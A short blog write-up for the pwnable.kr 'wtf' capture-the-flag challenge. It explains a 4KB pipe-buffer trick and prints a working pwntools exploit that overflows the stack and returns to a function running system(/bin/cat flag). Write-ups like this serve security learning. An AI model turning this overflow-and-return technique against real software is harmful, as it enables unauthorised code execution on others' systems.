[pwnable.kr] - wtf

Q:
I don't understand why my exploit is not working.
I need your help.

download : http://pwnable.kr/bin/wtf
download : http://pwnable.kr/bin/wtf.py

Running at : nc pwnable.kr 9015

write-ups:

Thanks to the pipe in Kernel is 4KB.
if we fill it over 4KB, then the process of wtf will be blocking temporarily for waiting new data from pipe.

from pwn import *

r = remote('pwnable.kr', 9015)
r.recvuntil('payload please : ')

print "Connected!"

win = 0x4005F4 # system(/bin/cat flag)
payload = (0x38)*'B' +  p64(win) + '\x0a'
padding = 4093*'A' # for damn pipe buffer..

#gdb.attach(r, 'b *(main+84)')
show = "-1\n" + padding + payload + '\x0a'
r.send(show.encode('hex'))

r.interactive()
posted @ 2018-04-10 06:43  jeremyatchina  阅读(573)  评论(0编辑  收藏  举报